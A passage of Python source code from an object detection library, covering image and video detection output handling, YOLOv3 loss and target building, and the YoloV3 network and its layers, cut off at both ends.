cv.COLOR_RGB2BGR)\r\n\r\n elif self.__model_type == \"retinanet\":\r\n original_input_image = tensor_to_ndarray(original_imgs[0].div(255.0))\r\n original_input_image = cv.cvtColor(original_input_image, cv.COLOR_RGB2BGR)\r\n for idx, pred in predictions.items():\r\n\r\n max_dim = max(list(original_imgs[idx].size()))\r\n\r\n for label, score, bbox in pred:\r\n percentage_conf = round(score * 100, 2)\r\n if percentage_conf < minimum_percentage_probability:\r\n continue\r\n\r\n displayed_label = \"\"\r\n if display_object_name:\r\n displayed_label = f\"{label} :\"\r\n if display_percentage_probability:\r\n displayed_label += f\" {percentage_conf}%\"\r\n\r\n original_imgs[idx] = draw_bounding_boxes_and_labels(\r\n image=original_imgs[idx],\r\n boxes=torch.Tensor([[bbox[\"x1\"], bbox[\"y1\"], bbox[\"x2\"], bbox[\"y2\"]]]),\r\n draw_boxes=display_box,\r\n labels=[displayed_label],\r\n label_color=(0, 0, 255),\r\n box_color=(0, 255, 0),\r\n width=1,\r\n fill=False,\r\n font_size=int(max_dim / 30)\r\n )\r\n\r\n output_image_array = tensor_to_ndarray(original_imgs[0].div(255.0))\r\n output_image_array = cv.cvtColor(output_image_array, cv.COLOR_RGB2BGR)\r\n\r\n \r\n predictions_batch = list(predictions.values())\r\n predictions_list = predictions_batch[0] if len(predictions_batch) > 0 else []\r\n min_probability = minimum_percentage_probability / 100\r\n\r\n if output_type == \"file\":\r\n if output_image_path:\r\n cv.imwrite(output_image_path, output_image_array)\r\n\r\n if extract_detected_objects:\r\n extraction_dir = \".\".join(output_image_path.split(\".\")[:-1]) + \"-extracted\"\r\n os.mkdir(extraction_dir)\r\n count = 0\r\n for obj_prediction in predictions_list:\r\n if obj_prediction[1] >= min_probability:\r\n count += 1\r\n extracted_path = os.path.join(\r\n extraction_dir,\r\n \".\".join(os.path.basename(output_image_path).split(\".\")[:-1]) + f\"-{count}.jpg\"\r\n )\r\n obj_bbox = obj_prediction[2]\r\n cv.imwrite(extracted_path, original_input_image[obj_bbox[\"y1\"]: obj_bbox[\"y2\"],\r\n obj_bbox[\"x1\"]: obj_bbox[\"x2\"]])\r\n\r\n extracted_objects.append(extracted_path)\r\n\r\n elif output_type == \"array\":\r\n if extract_detected_objects:\r\n for obj_prediction in predictions_list:\r\n if obj_prediction[1] >= min_probability:\r\n obj_bbox = obj_prediction[2]\r\n\r\n extracted_objects.append(\r\n original_input_image[obj_bbox[\"y1\"]: obj_bbox[\"y2\"], obj_bbox[\"x1\"]: obj_bbox[\"x2\"]])\r\n else:\r\n raise ValueError(f\"Invalid output_type '{output_type}'. Supported values are 'file' and 'array' \")\r\n\r\n predictions_list = [\r\n {\r\n \"name\": prediction[0], \"percentage_probability\": round(prediction[1] * 100, 2),\r\n \"box_points\": [prediction[2][\"x1\"], prediction[2][\"y1\"], prediction[2][\"x2\"], prediction[2][\"y2\"]]\r\n } for prediction in predictions_list if prediction[1] >= min_probability\r\n ]\r\n\r\n if output_type == \"array\":\r\n if extract_detected_objects:\r\n return output_image_array, predictions_list, extracted_objects\r\n else:\r\n return output_image_array, predictions_list\r\n else:\r\n if extract_detected_objects:\r\n return predictions_list, extracted_objects\r\n else:\r\n return predictions_list\r\n\r\n\r\nclass VideoObjectDetection:\r\n\r\n def __init__(self):\r\n self.__detector = ObjectDetection()\r\n\r\n def setModelTypeAsYOLOv3(self):\r\n self.__detector.setModelTypeAsYOLOv3()\r\n\r\n def setModelTypeAsTinyYOLOv3(self):\r\n self.__detector.setModelTypeAsTinyYOLOv3()\r\n\r\n def setModelTypeAsRetinaNet(self):\r\n self.__detector.setModelTypeAsRetinaNet()\r\n\r\n def setModelPath(self, model_path: str):\r\n extension_check(model_path)\r\n self.__detector.setModelPath(model_path)\r\n\r\n def loadModel(self):\r\n self.__detector.loadModel()\r\n\r\n def useCPU(self):\r\n self.__detector.useCPU()\r\n\r\n def CustomObjects(self, **kwargs):\r\n return self.__detector.CustomObjects(**kwargs)\r\n\r\n def detectObjectsFromVideo(self, input_file_path=\"\", camera_input=None, output_file_path=\"\", frames_per_second=20,\r\n frame_detection_interval=1, minimum_percentage_probability=50, log_progress=False,\r\n display_percentage_probability=True, display_object_name=True, display_box=True,\r\n save_detected_video=True,\r\n per_frame_function=None, per_second_function=None, per_minute_function=None,\r\n video_complete_function=None, return_detected_frame=False, detection_timeout=None,\r\n custom_objects=None):\r\n\r\n if (input_file_path == \"\" and camera_input == None):\r\n raise ValueError(\r\n \"You must set 'input_file_path' to a valid video file, or set 'camera_input' to a valid camera\")\r\n elif (save_detected_video == True and output_file_path == \"\"):\r\n raise ValueError(\r\n \"You must set 'output_video_filepath' to a valid video file name, in which the detected video will be saved. If you don't intend to save the detected video, set 'save_detected_video=False'\")\r\n\r\n else:\r\n try:\r\n\r\n output_frames_dict = {}\r\n output_frames_count_dict = {}\r\n\r\n input_video = cv.VideoCapture(input_file_path)\r\n if (camera_input != None):\r\n input_video = camera_input\r\n\r\n output_video_filepath = output_file_path + '.mp4'\r\n\r\n frame_width = int(input_video.get(3))\r\n frame_height = int(input_video.get(4))\r\n output_video = cv.VideoWriter(output_video_filepath, cv.VideoWriter_fourcc(*\"MP4V\"),\r\n frames_per_second,\r\n (frame_width, frame_height))\r\n\r\n counting = 0\r\n\r\n detection_timeout_count = 0\r\n video_frames_count = 0\r\n\r\n while (input_video.isOpened()):\r\n ret, frame = input_video.read()\r\n\r\n if (ret == True):\r\n\r\n video_frames_count += 1\r\n if (detection_timeout != None):\r\n if ((video_frames_count % frames_per_second) == 0):\r\n detection_timeout_count += 1\r\n\r\n if (detection_timeout_count >= detection_timeout):\r\n break\r\n\r\n output_objects_array = []\r\n\r\n counting += 1\r\n\r\n if (log_progress == True):\r\n print(\"Processing Frame : \", str(counting))\r\n\r\n detected_copy = frame.copy()\r\n\r\n check_frame_interval = counting % frame_detection_interval\r\n\r\n if (counting == 1 or check_frame_interval == 0):\r\n try:\r\n detected_copy, output_objects_array = self.__detector.detectObjectsFromImage(\r\n input_image=frame, output_type=\"array\",\r\n minimum_percentage_probability=minimum_percentage_probability,\r\n display_percentage_probability=display_percentage_probability,\r\n display_object_name=display_object_name,\r\n display_box=display_box,\r\n custom_objects=custom_objects)\r\n except:\r\n None\r\n\r\n output_frames_dict[counting] = output_objects_array\r\n\r\n output_objects_count = {}\r\n for eachItem in output_objects_array:\r\n eachItemName = eachItem[\"name\"]\r\n try:\r\n output_objects_count[eachItemName] = output_objects_count[eachItemName] + 1\r\n except:\r\n output_objects_count[eachItemName] = 1\r\n\r\n output_frames_count_dict[counting] = output_objects_count\r\n\r\n if (save_detected_video == True):\r\n output_video.write(detected_copy)\r\n\r\n if (counting == 1 or check_frame_interval == 0):\r\n if (per_frame_function != None):\r\n if (return_detected_frame == True):\r\n per_frame_function(counting, output_objects_array, output_objects_count,\r\n detected_copy)\r\n elif (return_detected_frame == False):\r\n per_frame_function(counting, output_objects_array, output_objects_count)\r\n\r\n if (per_second_function != None):\r\n if (counting != 1 and (counting % frames_per_second) == 0):\r\n\r\n this_second_output_object_array = []\r\n this_second_counting_array = []\r\n this_second_counting = {}\r\n\r\n for aa in range(counting):\r\n if (aa >= (counting - frames_per_second)):\r\n this_second_output_object_array.append(output_frames_dict[aa + 1])\r\n this_second_counting_array.append(output_frames_count_dict[aa + 1])\r\n\r\n for eachCountingDict in this_second_counting_array:\r\n for eachItem in eachCountingDict:\r\n try:\r\n this_second_counting[eachItem] = this_second_counting[eachItem] + \\\r\n eachCountingDict[eachItem]\r\n except:\r\n this_second_counting[eachItem] = eachCountingDict[eachItem]\r\n\r\n for eachCountingItem in this_second_counting:\r\n this_second_counting[eachCountingItem] = int(\r\n this_second_counting[eachCountingItem] / frames_per_second)\r\n\r\n if (return_detected_frame == True):\r\n per_second_function(int(counting / frames_per_second),\r\n this_second_output_object_array, this_second_counting_array,\r\n this_second_counting, detected_copy)\r\n\r\n elif (return_detected_frame == False):\r\n per_second_function(int(counting / frames_per_second),\r\n this_second_output_object_array, this_second_counting_array,\r\n this_second_counting)\r\n\r\n if (per_minute_function != None):\r\n\r\n if (counting != 1 and (counting % (frames_per_second * 60)) == 0):\r\n\r\n this_minute_output_object_array = []\r\n this_minute_counting_array = []\r\n this_minute_counting = {}\r\n\r\n for aa in range(counting):\r\n if (aa >= (counting - (frames_per_second * 60))):\r\n this_minute_output_object_array.append(output_frames_dict[aa + 1])\r\n this_minute_counting_array.append(output_frames_count_dict[aa + 1])\r\n\r\n for eachCountingDict in this_minute_counting_array:\r\n for eachItem in eachCountingDict:\r\n try:\r\n this_minute_counting[eachItem] = this_minute_counting[eachItem] + \\\r\n eachCountingDict[eachItem]\r\n except:\r\n this_minute_counting[eachItem] = eachCountingDict[eachItem]\r\n\r\n for eachCountingItem in this_minute_counting:\r\n this_minute_counting[eachCountingItem] = int(\r\n this_minute_counting[eachCountingItem] / (frames_per_second * 60))\r\n\r\n if (return_detected_frame == True):\r\n per_minute_function(int(counting / (frames_per_second * 60)),\r\n this_minute_output_object_array, this_minute_counting_array,\r\n this_minute_counting, detected_copy)\r\n\r\n elif (return_detected_frame == False):\r\n per_minute_function(int(counting / (frames_per_second * 60)),\r\n this_minute_output_object_array, this_minute_counting_array,\r\n this_minute_counting)\r\n\r\n\r\n else:\r\n break\r\n\r\n if (video_complete_function != None):\r\n\r\n this_video_output_object_array = []\r\n this_video_counting_array = []\r\n this_video_counting = {}\r\n\r\n for aa in range(counting):\r\n this_video_output_object_array.append(output_frames_dict[aa + 1])\r\n this_video_counting_array.append(output_frames_count_dict[aa + 1])\r\n\r\n for eachCountingDict in this_video_counting_array:\r\n for eachItem in eachCountingDict:\r\n try:\r\n this_video_counting[eachItem] = this_video_counting[eachItem] + \\\r\n eachCountingDict[eachItem]\r\n except:\r\n this_video_counting[eachItem] = eachCountingDict[eachItem]\r\n\r\n for eachCountingItem in this_video_counting:\r\n this_video_counting[eachCountingItem] = int(this_video_counting[eachCountingItem] / counting)\r\n\r\n video_complete_function(this_video_output_object_array, this_video_counting_array,\r\n this_video_counting)\r\n\r\n input_video.release()\r\n output_video.release()\r\n\r\n if (save_detected_video == True):\r\n return output_video_filepath\r\n\r\n except:\r\n raise ValueError(\r\n \"An error occured. It may be that your input video is invalid. Ensure you specified a proper string value for 'output_file_path' is 'save_detected_video' is not False. \"\r\n \"Also ensure your per_frame, per_second, per_minute or video_complete_analysis function is properly configured to receive the right parameters. \")\r\ndef bbox_iou(box1, box2, x1y1x2y2=True, GIoU=False, DIoU=False, CIoU=False, eps=1e-9):\r\n \r\n box2 = box2.T\r\n\r\n \r\n if x1y1x2y2: \r\n b1_x1, b1_y1, b1_x2, b1_y2 = box1[0], box1[1], box1[2], box1[3]\r\n b2_x1, b2_y1, b2_x2, b2_y2 = box2[0], box2[1], box2[2], box2[3]\r\n else: \r\n b1_x1, b1_x2 = box1[0] - box1[2] / 2, box1[0] + box1[2] / 2\r\n b1_y1, b1_y2 = box1[1] - box1[3] / 2, box1[1] + box1[3] / 2\r\n b2_x1, b2_x2 = box2[0] - box2[2] / 2, box2[0] + box2[2] / 2\r\n b2_y1, b2_y2 = box2[1] - box2[3] / 2, box2[1] + box2[3] / 2\r\n\r\n \r\n inter = (torch.min(b1_x2, b2_x2) - torch.max(b1_x1, b2_x1)).clamp(0) * \\\r\n (torch.min(b1_y2, b2_y2) - torch.max(b1_y1, b2_y1)).clamp(0)\r\n\r\n \r\n w1, h1 = b1_x2 - b1_x1, b1_y2 - b1_y1 + eps\r\n w2, h2 = b2_x2 - b2_x1, b2_y2 - b2_y1 + eps\r\n union = w1 * h1 + w2 * h2 - inter + eps\r\n\r\n iou = inter / union\r\n if GIoU or DIoU or CIoU:\r\n \r\n cw = torch.max(b1_x2, b2_x2) - torch.min(b1_x1, b2_x1)\r\n ch = torch.max(b1_y2, b2_y2) - torch.min(b1_y1, b2_y1) \r\n if CIoU or DIoU: \r\n c2 = cw ** 2 + ch ** 2 + eps \r\n rho2 = ((b2_x1 + b2_x2 - b1_x1 - b1_x2) ** 2 +\r\n (b2_y1 + b2_y2 - b1_y1 - b1_y2) ** 2) / 4 \r\n if DIoU:\r\n return iou - rho2 / c2 \r\n elif CIoU: \r\n v = (4 / math.pi ** 2) * \\\r\n torch.pow(torch.atan(w2 / h2) - torch.atan(w1 / h1), 2)\r\n with torch.no_grad():\r\n alpha = v / ((1 + eps) - iou + v)\r\n return iou - (rho2 / c2 + v * alpha) \r\n else: \r\n c_area = cw * ch + eps \r\n return iou - (c_area - union) / c_area \r\n else:\r\n return iou \r\n\r\n\r\ndef compute_loss(loss_layers, targets, device=\"cpu\"):\r\n nc = loss_layers[0].num_classes\r\n nl = len(loss_layers)\r\n \r\n predictions = [layer.pred for layer in loss_layers]\r\n\r\n \r\n lcls, lbox, lobj = torch.zeros(1, device=device), torch.zeros(1, device=device), torch.zeros(1, device=device)\r\n\r\n \r\n tcls, tbox, indices, anchors = build_targets(predictions, targets, loss_layers, device) \r\n\r\n BCEcls = nn.BCEWithLogitsLoss(\r\n pos_weight=torch.tensor([1.0], device=device))\r\n BCEobj = nn.BCEWithLogitsLoss(\r\n pos_weight=torch.tensor([1.0], device=device))\r\n\r\n balance = [4.0, 1.0, 0.4]\r\n\r\n \r\n for layer_index, layer_predictions in enumerate(predictions):\r\n \r\n b, anchor, grid_j, grid_i = indices[layer_index]\r\n \r\n tobj = torch.zeros_like(layer_predictions[..., 0], device=device) \r\n \r\n \r\n \r\n num_targets = b.shape[0]\r\n \r\n if num_targets:\r\n \r\n ps = layer_predictions[b, anchor, grid_j, grid_i]\r\n\r\n \r\n \r\n pxy = ps[:, :2].sigmoid() * 2 - 0.5\r\n \r\n pwh = (ps[:, 2:4].sigmoid() * 2) ** 2 * anchors[layer_index]\r\n \r\n pbox = torch.cat((pxy, pwh), 1)\r\n \r\n iou = bbox_iou(pbox.T, tbox[layer_index], x1y1x2y2=False, CIoU=True)\r\n \r\n lbox += (1.0 - iou).mean() \r\n\r\n \r\n \r\n tobj[b, anchor, grid_j, grid_i] = iou.detach().clamp(0).type(tobj.dtype) \r\n\r\n \r\n \r\n if nc > 1:\r\n \r\n t = torch.full_like(ps[:, 5:], 0.0, device=device) \r\n t[range(num_targets), tcls[layer_index]] = 1\r\n \r\n lcls += BCEcls(ps[:, 5:], t) \r\n\r\n \r\n \r\n obji = BCEobj(layer_predictions[..., 4], tobj) \r\n lobj += obji * balance[layer_index]\r\n\r\n lbox *= 0.05\r\n lobj *= (1.0 * ((416 / 640) ** 2)) \r\n lcls *= (0.5 * (nc / 80)) \r\n\r\n \r\n loss = (lbox + lobj + lcls) * tobj.shape[0]\r\n\r\n return loss, (torch.cat((lbox, lobj, lcls))).detach()\r\n\r\n\r\ndef build_targets(p, targets, loss_layers, device=\"cpu\"):\r\n \r\n na, nt = len(loss_layers[0].anchors), targets.shape[0] \r\n tcls, tbox, indices, anch = [], [], [], []\r\n gain = torch.ones(7, device=device) \r\n \r\n ai = torch.arange(na, device=device).float().view(na, 1).repeat(1, nt)\r\n \r\n targets = torch.cat((targets.repeat(na, 1, 1), ai[:, :, None]), 2)\r\n\r\n g = 0.5\r\n off = torch.tensor([\r\n [0, 0], [1, 0], [0, 1],\r\n [-1, 0], [0, -1]\r\n ], device=device).float() * g \r\n\r\n for i, yolo_layer in enumerate(loss_layers):\r\n \r\n anchors = yolo_layer.anchors / yolo_layer.stride\r\n \r\n \r\n gain[2:6] = torch.tensor(p[i].shape)[[3, 2, 3, 2]] \r\n \r\n t = targets * gain\r\n \r\n if nt:\r\n \r\n r = t[:, :, 4:6] / anchors[:, None]\r\n \r\n j = torch.max(r, 1.0 / r).max(2)[0] < 4.0 \r\n \r\n \r\n \r\n t = t[j]\r\n\r\n \r\n gxy = t[:, 2:4] \r\n gxi = gain[[2,3]] - gxy\r\n j, k = ((gxy % 1 < g) & (gxy > 1)).T\r\n l, m = ((gxi % 1 < g) & (gxi > 1)).T\r\n j = torch.stack((torch.ones_like(j), j, k, l, m))\r\n t = t.repeat((5, 1, 1))[j]\r\n offsets = (torch.zeros_like(gxy)[None] + off[:, None])[j]\r\n else:\r\n t = targets[0]\r\n offsets = 0\r\n\r\n \r\n b, c = t[:, :2].long().T\r\n \r\n \r\n gxy = t[:, 2:4] \r\n gwh = t[:, 4:6] \r\n \r\n gij = (gxy - offsets).long()\r\n \r\n gi, gj = gij.T \r\n\r\n \r\n a = t[:, 6].long()\r\n \r\n \r\n indices.append((b, a, gj.clamp_(0, int(gain[3] - 1)), gi.clamp_(0, int(gain[2] - 1))))\r\n \r\n tbox.append(torch.cat((gxy - gij, gwh), 1)) \r\n \r\n anch.append(anchors[a])\r\n \r\n tcls.append(c)\r\n\r\n return tcls, tbox, indices, anch\r\n\r\ndef noop(x):\r\n return x\r\n\r\n\r\nclass DetectionLayer(nn.Module):\r\n\r\n def __init__(\r\n self,\r\n anchors: Union[List[int], Tuple[int, ...]],\r\n anchor_masks: Tuple[int, int, int],\r\n layer: int,\r\n num_classes: int = 80,\r\n device: str = \"cpu\"\r\n ):\r\n super().__init__()\r\n self.height = 416\r\n self.width = 416\r\n self.num_classes = num_classes\r\n self.ignore_thresh = 0.7\r\n self.truth_thresh = 1\r\n self.rescore = 1\r\n self.device = device\r\n self.anchors = self.__get_anchors(anchors, anchor_masks)\r\n self.layer = layer\r\n self.layer_width = None\r\n self.layer_height = None\r\n self.layer_output = None\r\n self.pred = None\r\n self.stride = None\r\n self.grid = None\r\n self.anchor_grid = None\r\n\r\n def __get_anchors(\r\n self, anchors: Union[List[int], Tuple[int, ...]],\r\n anchor_masks: Tuple[int, int, int]\r\n ) -> torch.Tensor:\r\n a = [(anchors[i], anchors[i + 1]) for i in range(0, len(anchors), 2)]\r\n return torch.tensor([a[i] for i in anchor_masks]).to(self.device)\r\n\r\n def forward(self, x: torch.Tensor):\r\n self.layer_height, self.layer_width = x.shape[2], x.shape[3]\r\n self.stride = self.height // self.layer_height\r\n if self.training:\r\n batch_size = x.shape[0]\r\n grid_size = x.shape[2]\r\n bbox_attrs = 5 + self.num_classes\r\n num_anchors = len(self.anchors)\r\n\r\n \r\n self.layer_output = x.detach()\r\n self.pred = x.view(batch_size, num_anchors, bbox_attrs, grid_size, grid_size).permute(0, 1, 3, 4,\r\n 2).contiguous()\r\n\r\n self.layer_output = self.layer_output.view(batch_size, bbox_attrs * num_anchors, grid_size * grid_size)\r\n self.layer_output = self.layer_output.transpose(1, 2).contiguous()\r\n self.layer_output = self.layer_output.view(batch_size, grid_size * grid_size * num_anchors, bbox_attrs)\r\n\r\n else:\r\n \r\n \r\n self.layer_output = transform_prediction(\r\n x.data, self.width, self.anchors, self.num_classes,\r\n self.device\r\n )\r\n return self.layer_output\r\n\r\n\r\nclass ConvLayer(nn.Module):\r\n\r\n def __init__(self, in_f: int, out_f: int, kernel_size: int = 3,\r\n stride: int = 1, use_batch_norm: bool = True,\r\n activation: str = \"leaky\"):\r\n super().__init__()\r\n self.conv = nn.Conv2d(\r\n in_f, out_f, stride=stride, kernel_size=kernel_size,\r\n padding=kernel_size // 2,\r\n bias=False if use_batch_norm else True\r\n )\r\n self.batch_norm = nn.BatchNorm2d(out_f) if use_batch_norm else noop\r\n self.leaky_relu = nn.LeakyReLU(0.1, inplace=True) if activation == \"leaky\" else noop\r\n\r\n def forward(self, x: torch.Tensor):\r\n return self.leaky_relu(self.batch_norm(self.conv(x)))\r\n\r\n\r\nclass YoloV3(nn.Module):\r\n\r\n def __init__(\r\n self,\r\n anchors: Union[List[int], Tuple[int, ...]],\r\n num_classes: int = 80,\r\n device: str = \"cpu\"):\r\n super().__init__()\r\n\r\n \r\n self.conv1 = ConvLayer(3, 32)\r\n self.conv2 = ConvLayer(32, 64, stride=2)\r\n self.conv3 = ConvLayer(64, 32, 1, 1)\r\n self.conv4 = ConvLayer(32, 64)\r\n \r\n self.conv5 = ConvLayer(64, 128, stride=2)\r\n self.conv6 = ConvLayer(128, 64, 1, 1)\r\n self.conv7 = ConvLayer(64, 128, stride=1)\r\n \r\n self.conv8 = ConvLayer(128, 64, 1, 1)\r\n self.conv9 = ConvLayer(64, 128, stride=1)\r\n \r\n self.conv10 = ConvLayer(128, 256, stride=2)\r\n self.conv11 = ConvLayer(256, 128, 1, 1)\r\n self.conv12 = ConvLayer(128, 256)\r\n \r\n self.conv13 = ConvLayer(256, 128, 1, 1)\r\n self.conv14 = ConvLayer(128, 256)\r\n \r\n self.conv15 = ConvLayer(256, 128, 1, 1)\r\n self.conv16 = ConvLayer(128, 256)\r\n \r\n self.conv17 = ConvLayer(256, 128, 1, 1)\r\n self.conv18 = ConvLayer(128, 256)\r\n \r\n self.conv19 = ConvLayer(256, 128, 1, 1)\r\n self.conv20 = ConvLayer(128, 256)\r\n \r\n self.conv21 = ConvLayer(256, 128, 1, 1)\r\n self.conv22 = ConvLayer(128, 256)\r\n \r\n self.conv23 = ConvLayer(256, 128, 1, 1)\r\n self.conv24 = ConvLayer(128, 256)\r\n \r\n self.conv25 = ConvLayer(256, 128, 1, 1)\r\n self.conv26 = ConvLayer(128, 256)\r\n \r\n self.conv27 = ConvLayer(256, 512, stride=2)\r\n self.conv28 = ConvLayer(512, 256, 1, 1)\r\n self.conv29 = ConvLayer(256, 512)\r\n \r\n self.conv30 = ConvLayer(512, 256, 1, 1)\r\n self.conv31 = ConvLayer(256, 512)\r\n \r\n self.conv32 = ConvLayer(512, 256, 1, 1)\r\n self.conv33 = ConvLayer(256, 512)\r\n \r\n self.conv34 = ConvLayer(512, 256, 1, 1)\r\n self.conv35 = ConvLayer(256, 512)\r\n \r\n self.conv36 = ConvLayer(512, 256, 1, 1)\r\n self.conv37 = ConvLayer(256, 512)\r\n \r\n self.conv38 = ConvLayer(512, 256, 1, 1)\r\n self.conv39 = ConvLayer(256, 512)\r\n \r\n self.conv40 = ConvLayer(512, 256, 1, 1)\r\n self.conv41 = ConvLayer(256, 512)\r\n \r\n self.conv42 = ConvLayer(512, 256, 1, 1)\r\n self.conv43 = ConvLayer(256, 512)\r\n \r\n self.conv44 = ConvLayer(512, 1024, stride=2)\r\n self.conv45 = ConvLayer(1024, 512, 1, 1)\r\n self.conv46 = ConvLayer(512, 1024)\r\n \r\n self.conv47 = ConvLayer(1024, 512, 1, 1)\r\n self.conv48 = ConvLayer(512, 1024)\r\n \r\n self.conv49 = ConvLayer(1024, 512, 1, 1)\r\n self.conv50 = ConvLayer(512, 1024)\r\n \r\n self.conv51 = ConvLayer(1024, 512, 1, 1)\r\n self.conv52 = ConvLayer(512, 1024)\r\n \r\n self.conv53 = ConvLayer(1024, 512, 1, 1)\r\n self.conv54 = ConvLayer(512, 1024)\r\n self.conv55 = ConvLayer(1024, 512, 1, 1)\r\n self.conv56 = ConvLayer(512, 1024)\r\n self.conv57 = ConvLayer(1024, 512, 1, 1)\r\n self.conv58 = ConvLayer(512, 1024)\r\n self.conv59 = ConvLayer(\r\n 1024, (3 * (5 + num_classes)), 1, 1, use_batch_norm=False,\r\n activation=\"linear\"\r\n )\r\n\r\n \r\n self.yolo1 = DetectionLayer(\r\n num_classes=num_classes, anchors=anchors,\r\n anchor_masks=(6, 7, 8), device=device, layer=1\r\n )\r\n\r\n \r\n self.conv60 = ConvLayer(512, 256, 1, 1)\r\n self.upsample1 = nn.Upsample(\r\n scale_factor=2, mode=\"nearest\"\r\n \r\n )\r\n \r\n self.conv61 = ConvLayer(768, 256, 1, 1)\r\n self.conv62 = ConvLayer(256, 512)\r\n self.conv63 = ConvLayer(512, 256, 1, 1)\r\n self.conv64 = ConvLayer(256, 512)\r\n self.conv65 = ConvLayer(512, 256, 1, 1)\r\n self.conv66 = ConvLayer(256, 512)\r\n self.conv67 = ConvLayer(\r\n 512, (3 * (5 + num_classes)), 1, 1, use_batch_norm=False,\r\n activation=\"linear\"\r\n )\r\n\r\n \r\n self.yolo2 = DetectionLayer(\r\n num_classes=num_classes, anchors=anchors,\r\n anchor_masks=(3, 4, 5), device=device, layer=2\r\n )\r\n\r\n \r\n self.conv68 = ConvLayer(256, 128, 1, 1)\r\n self.upsample2 = nn.Upsample(\r\n scale_factor=2, mode=\"nearest\"\r\n \r\n )\r\n \r\n\r\n self.conv69 = ConvLayer(384, 128, 1, 1)\r\n self.conv70 = ConvLayer(128, 256)\r\n self.conv71 = ConvLayer(256, 128, 1, 1)\r\n self.conv72 = ConvLayer(128, 256)\r\n self.conv73 = ConvLayer(256, 128, 1, 1)\r\n self.conv74 = ConvLayer(128, 256)\r\n self.conv75 = ConvLayer(\r\n 256, (3 * (5 + num_classes)), 1, 1, use_batch_norm=False,\r\n activation=\"linear\"\r\n )\r\n\r\n \r\n self.yolo3 = DetectionLayer(\r\n num_classes=num_classes, anchors=anchors,\r\n anchor_masks=(0, 1, 2), device=device, layer=3\r\n )\r\n\r\n def get_loss_layers(self) -> List[torch.Tensor]:\r\n return [self.yolo1, self.yolo2, self.yolo3]\r\n\r\n def __route_layer(self, y1: torch.Tensor, y2: Optional[torch.Tensor] = None):\r\n if isinstance(y2, torch.Tensor):\r\n return torch.cat([y1, y2], 1)\r\n return y1\r\n\r\n def __shortcut_layer(self,\r\n y1: torch.Tensor, y2: torch.Tensor,\r\n activation: str = \"linear\"\r\n ) -> torch.Tensor:\r\n actv = noop if activation == \"linear\" else nn.LeakyReLU(0.1)\r\n return actv(y1 + y2)\r\n\r\n def forward(self, x: torch.Tensor) -> torch.Tensor:\r\n y = self.conv2(self.conv1(x))\r\n \r\n y = self.conv5(self.__shortcut_layer(self.conv4(self.conv3(y)), y))\r\n y2 = self.conv7(self.conv6(y))\r\n \r\n y = self.__shortcut_layer(y2, y)\r\n y2 = self.conv9(self.conv8(y))\r\n \r\n y2 = self.conv10(self.__shortcut_layer(y2, y))\r\n y = self.conv12(self.conv11(y2))\r\n \r\n y2 = self.__shortcut_layer(y, y2)\r\n y = self.conv14(self.conv13(y2))\r\n \r\n y2 = self.__shortcut_layer(y, y2)\r\n y = self.conv16(self.conv15(self.__shortcut_layer(y2, y)))\r\n \r\n y2 = self.__shortcut_layer(y, y2)\r\n y = self.conv18(self.conv17(y2))\r\n \r\n y2 = self.__shortcut_layer(y, y2)\r\n y = self.conv20(self.conv19(y2))\r\n \r\n y2 = self.__shortcut_layer(y, y2)\r\n y = self.conv22(self.conv21(y2))\r\n \r\n y2 = self.__shortcut_layer(y, y2)\r\n y = self.conv24(self.conv23(y2))\r\n \r\n y2 = self.__shortcut_layer(y, y2)\r\n y = self.conv26(self.conv25(y2))\r\n \r\n r1 = self.__shortcut_layer(y, y2) \r\n y = self.conv27(r1)\r\n y2 = self.conv29(self.conv28(y))\r\n \r\n y = self.__shortcut_layer(y2, y)\r\n y2 = self.conv31(self.conv30(y))\r\n \r\n y = self.__shortcut_layer(y2, y)\r\n y2 = self.conv33(self.conv32(y))\r\n \r\n y = self.__shortcut_layer(y2, y)\r\n y2 = self.conv35(self.conv34(y))\r\n \r\n y = self.__shortcut_layer(y2, y)\r\n y2 = self.conv37(self.conv36(y))\r\n \r\n y = self.__shortcut_layer(y2, y)\r\n y2 = self.conv39(self.conv38(y))\r\n \r\n y = self.__shortcut_layer(y2, y)\r\n y2 = self.conv41(self.conv40(y))\r\n \r\n y = self.__shortcut_layer(y2, y)\r\n y2 = self.conv43(self.conv42(y))\r\n \r\n r2 = self.__shortcut_layer(y2, y) \r\n y2 = self.conv44(r2)\r\n y = self.conv46(self.conv45(y2))\r\n \r\n y2 = self.__shortcut_layer(y, y2)\r\n y = self.conv48(self.conv47(y2))\r\n \r\n y2 = self.__shortcut_layer(y, y2)\r\n y = self.conv50(self.conv49(y2))\r\n \r\n y2 = self.__shortcut_layer(y, y2)\r\n y = self.conv52(self.conv51(y2))\r\n \r\n y2 = self.__shortcut_layer(y, y2)\r\n y = self.conv54(self.conv53(y2))\r\n r3 = self.conv57(self.conv56(self.conv55(y))) \r\n y = self.conv59(self.conv58(r3))\r\n\r\n \r\n out = self.yolo1(y)\r\n y = self.conv60(self.__route_layer(r3))\r\n y = self.conv62(self.conv61(self.__route_layer(self.upsample1(y), r2)))\r\n r4 = self.conv65(self.conv64(self.conv63(y))) \r\n y = self.conv67(self.conv66(r4))\r\n\r\n \r\n out = torch.cat([out, self.yolo2(y)], dim=1)\r\n y = self.conv68(self.__route_layer(r4))\r\n y = self.conv70(self.conv69(self.__route_layer(self.upsample2(y), r1)))\r\n y = self.conv75(self.conv74(self.conv73(self.conv72(self.conv71(y)))))\r\n\r\n \r\n out = torch.cat([out, self.yolo3(y)], dim=1)\r\n\r\n return out\r\n\r\ndef draw_bbox_and_label(x: torch.Tensor, label: str, img: np.ndarray) -> np.ndarray:\r\n\r\n x1, y1, x2, y2 = tuple(map(int, x))\r\n if x is not None:\r\n img = cv.rectangle(img, (x1, y1), (x2, y2), (0, 255, 0), 1)\r\n t_size = cv.getTextSize(label, cv.FONT_HERSHEY_PLAIN, 1, 1)[0]\r\n c2 = (x1 + t_size[0] + 3, y1 + t_size[1] + 4)\r\n img = cv.putText(img, label, (x1, y1 + t_size[1] + 4), cv.FONT_HERSHEY_PLAIN, 1, (0, 0, 255), 1)\r\n\r\n return img\r\n\r\n\r\ndef letterbox_image(\r\n image: np.ndarray,\r\n inp_dim: Tuple[int, int]) -> np.ndarray:\r\n\r\n img_w, img_h = image.shape[1], image.shape[0] \r\n net_w, net_h = inp_dim \r\n\r\n\r\n scale_factor = min(net_w / img_w, net_h / img_h)\r\n new_w = int(round(img_w * scale_factor))\r\n new_h = int(round(img_h * scale_factor))\r\n\r\n resized_image = cv.resize(image, (new_w, new_h), interpolation=cv.INTER_CUBIC)\r\n canvas = np.full((net_w, net_h, 3), 128)\r\n canvas[(net_h - new_h) // 2: (net_h - new_h) // 